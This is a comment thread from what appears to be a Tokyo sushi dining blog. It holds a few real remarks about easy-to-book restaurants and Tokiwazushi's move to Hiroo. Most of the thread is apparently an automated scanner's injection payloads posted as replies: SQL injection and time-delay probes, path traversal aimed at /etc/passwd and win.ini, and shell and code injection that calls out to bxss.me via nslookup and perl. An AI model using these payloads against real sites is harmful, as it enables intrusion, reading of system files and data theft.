Just went to Sushi Comari on this list, while it wasn't really my cup of tea. Superb CP, 8k Lunch for 13 nigiri. A good spot for travellers on a budget, who want a omakase fix.
Thanks for sharing. Agree with Suzuki and Owana and Tsukiuda is good too but definitely do not recommend Udatsu and Kizaki. Don't think the others are notable.
9 Comments
Link was eaten so here it is again: https://www.luxeat.com/blog/15-easy-to-book-sushi-hotspots-in-tokyo/
re: thetokyogourmet
1CKbkmNi9LO
re: thetokyogourmet
response.write(9134126*9842983)
re: thetokyogourmet
'+response.write(9134126*9842983)+'
re: thetokyogourmet
"+response.write(9134126*9842983)+"
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
%0abcc:074625.67-22134.67.e433e.19990.2@bxss.me
re: thetokyogourmet
${9999762+10000324}
re: thetokyogourmet
to@example.com>%0d%0abcc:074625.67-22135.67.e433e.19990.2@bxss.me
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
'.gethostbyname(lc('hitfl'.'mxdspwcia48b0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(70).chr(99).chr(77).'
re: thetokyogourmet
../../../../../../../../../../../../../../../proc/version
re: thetokyogourmet
)
re: thetokyogourmet
".gethostbyname(lc("hitdy"."sathnnwo6a30e.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(87).chr(99).chr(80)."
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
../../../../../../../../../../etc/passwd%00.jpg
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: thetokyogourmet
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: thetokyogourmet
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: thetokyogourmet
echo hpmtxn$()\ tijpgj\nz^xyu||a #' &echo hpmtxn$()\ tijpgj\nz^xyu||a #|" &echo hpmtxn$()\ tijpgj\nz^xyu||a #
re: thetokyogourmet
/etc/passwd
re: thetokyogourmet
&echo hqbplf$()\ pdxgop\nz^xyu||a #' &echo hqbplf$()\ pdxgop\nz^xyu||a #|" &echo hqbplf$()\ pdxgop\nz^xyu||a #
re: thetokyogourmet
%2fetc%2fpasswd
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
|echo mmnpuh$()\ uttbcj\nz^xyu||a #' |echo mmnpuh$()\ uttbcj\nz^xyu||a #|" |echo mmnpuh$()\ uttbcj\nz^xyu||a #
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(109).concat(81).concat(105).concat(73)+(require"socket"
Socket.gethostbyname("hityl"+"mofnpqaffa9fe.bxss.me.")[3].to_s)+"
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: thetokyogourmet
/.././.././.././.././.././.././.././../etc/./passwd%00
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
(nslookup hiteecmmdrgxebe739.bxss.me||perl -e "gethostbyname('hiteecmmdrgxebe739.bxss.me')")
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(117).concat(66).concat(110).concat(67)+(require'socket'
Socket.gethostbyname('hitgc'+'ibmiahdj24adb.bxss.me.')[3].to_s)+'
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: thetokyogourmet
$(nslookup hitoywlzkgvnec1226.bxss.me||perl -e "gethostbyname('hitoywlzkgvnec1226.bxss.me')")
re: thetokyogourmet
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: thetokyogourmet
&nslookup hitblzjyqfhuj5ecf5.bxss.me&'\"`0&nslookup hitblzjyqfhuj5ecf5.bxss.me&`'
re: thetokyogourmet
http://bxss.me/t/fit.txt%3F.jpg
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: thetokyogourmet
&(nslookup hitvtgaqtvisy22b0a.bxss.me||perl -e "gethostbyname('hitvtgaqtvisy22b0a.bxss.me')")&'\"`0&(nslookup hitvtgaqtvisy22b0a.bxss.me||perl -e "gethostbyname('hitvtgaqtvisy22b0a.bxss.me')")&`'
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: thetokyogourmet
|(nslookup hitapyncajvurfee6d.bxss.me||perl -e "gethostbyname('hitapyncajvurfee6d.bxss.me')")
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: thetokyogourmet
'"
re: thetokyogourmet
`(nslookup hitdeobdpdwdhaf0e7.bxss.me||perl -e "gethostbyname('hitdeobdpdwdhaf0e7.bxss.me')")`
re: thetokyogourmet
bxss.me
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
<!--
re: thetokyogourmet
;(nslookup hitmnyylwkpwb0aa9c.bxss.me||perl -e "gethostbyname('hitmnyylwkpwb0aa9c.bxss.me')")|(nslookup hitmnyylwkpwb0aa9c.bxss.me||perl -e "gethostbyname('hitmnyylwkpwb0aa9c.bxss.me')")&(nslookup hitmnyylwkpwb0aa9c.bxss.me||perl -e "gethostbyname('hitmnyylwkpwb0aa9c.bxss.me')")
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
/\../\../\../\../\../\../\../etc/passwd
re: thetokyogourmet
/WEB-INF/web.xml
re: thetokyogourmet
C:\WINDOWS\system32\drivers\etc\hosts
re: thetokyogourmet
../../../../../../../../../../windows/win.ini%00.jpg
re: thetokyogourmet
/../../../../../../../../../../boot.ini
re: thetokyogourmet
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: thetokyogourmet
..\..\..\..\..\..\..\..\windows\win.ini
re: thetokyogourmet
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: thetokyogourmet
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: thetokyogourmet
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: thetokyogourmet
WEB-INF/web.xml
re: thetokyogourmet
WEB-INF\web.xml
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
-1 OR 2+277-277-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 3+277-277-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 2+157-157-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+157-157-1=0+0+0+1
re: thetokyogourmet
-1' OR 2+385-385-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 3+385-385-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 2+733-733-1=0+0+0+1 or 'G0lJ2awH'='
re: thetokyogourmet
-1' OR 3+733-733-1=0+0+0+1 or 'G0lJ2awH'='
re: thetokyogourmet
-1" OR 2+317-317-1=0+0+0+1 --
re: thetokyogourmet
-1" OR 3+317-317-1=0+0+0+1 --
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
if2WIICI'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 428=(SELECT 428 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 931=(SELECT 931 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 133=(SELECT 133 FROM PG_SLEEP(15))--
re: thetokyogourmet
8i7Yc0dd' OR 585=(SELECT 585 FROM PG_SLEEP(15))--
re: thetokyogourmet
MxqtfjAe') OR 381=(SELECT 381 FROM PG_SLEEP(15))--
re: thetokyogourmet
3dppO81L')) OR 799=(SELECT 799 FROM PG_SLEEP(15))--
re: thetokyogourmet
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@GUQmW
Some of the pricing info are outdated though. Tokiwazushi is moving to Tokyo Hiroo in March, I assume likely it will no longer be easy to book.
re: guest
1Bq85ct4XiO
re: guest
response.write(9350270*9987587)
re: guest
'+response.write(9350270*9987587)+'
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
"+response.write(9350270*9987587)+"
re: guest
%0abcc:074625.67-22123.67.75275.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-22124.67.75275.19990.2@bxss.me
re: guest
${9999604+10000105}
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
)
re: guest
'.gethostbyname(lc('hitjx'.'xxgqvtpk309bf.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(78).chr(102).chr(67).'
re: guest
file:///etc/passwd
re: guest
!(()&&!|*|*|
re: guest
".gethostbyname(lc("hitsg"."nkrakgbz1196a.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(80).chr(111).chr(74)."
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
^(#$!@#$)(()))******
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
"+"A".concat(70-3).concat(22*4).concat(107).concat(70).concat(115).concat(83)+(require"socket"
Socket.gethostbyname("hitmo"+"ypcozowvb26a0.bxss.me.")[3].to_s)+"
re: guest
bxss.me/t/xss.html?%00
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
'+'A'.concat(70-3).concat(22*4).concat(119).concat(89).concat(114).concat(80)+(require'socket'
Socket.gethostbyname('hitya'+'puvxmkuvcb2c2.bxss.me.')[3].to_s)+'
re: guest
echo iuzurm$()\ vfpiiu\nz^xyu||a #' &echo iuzurm$()\ vfpiiu\nz^xyu||a #|" &echo iuzurm$()\ vfpiiu\nz^xyu||a #
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
&echo osufsr$()\ xginan\nz^xyu||a #' &echo osufsr$()\ xginan\nz^xyu||a #|" &echo osufsr$()\ xginan\nz^xyu||a #
re: guest
/etc/passwd
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
|echo xutpez$()\ qgckqx\nz^xyu||a #' |echo xutpez$()\ qgckqx\nz^xyu||a #|" |echo xutpez$()\ qgckqx\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
'"
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
Http://bxss.me/t/fit.txt
re: guest
(nslookup hityueeiirmft72aee.bxss.me||perl -e "gethostbyname('hityueeiirmft72aee.bxss.me')")
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
<!--
re: guest
';print(md5(31337));$a='
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
$(nslookup hitbcovjaearia5af6.bxss.me||perl -e "gethostbyname('hitbcovjaearia5af6.bxss.me')")
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
";print(md5(31337));$a="
re: guest
/etc/shells
re: guest
&nslookup hitekzlvmjnow9b51a.bxss.me&'\"`0&nslookup hitekzlvmjnow9b51a.bxss.me&`'
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
${@print(md5(31337))}
re: guest
c:/windows/win.ini
re: guest
&(nslookup hitlswfhmlnbv14739.bxss.me||perl -e "gethostbyname('hitlswfhmlnbv14739.bxss.me')")&'\"`0&(nslookup hitlswfhmlnbv14739.bxss.me||perl -e "gethostbyname('hitlswfhmlnbv14739.bxss.me')")&`'
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
${@print(md5(31337))}\
re: guest
bxss.me
re: guest
|(nslookup hitdjowhmdqox0484b.bxss.me||perl -e "gethostbyname('hitdjowhmdqox0484b.bxss.me')")
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
'.print(md5(31337)).'
re: guest
`(nslookup hitvasiywdnmse979b.bxss.me||perl -e "gethostbyname('hitvasiywdnmse979b.bxss.me')")`
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
;(nslookup hitphxmatmglgdafad.bxss.me||perl -e "gethostbyname('hitphxmatmglgdafad.bxss.me')")|(nslookup hitphxmatmglgdafad.bxss.me||perl -e "gethostbyname('hitphxmatmglgdafad.bxss.me')")&(nslookup hitphxmatmglgdafad.bxss.me||perl -e "gethostbyname('hitphxmatmglgdafad.bxss.me')")
re: guest
file:///etc/passwd
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
/WEB-INF/web.xml
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\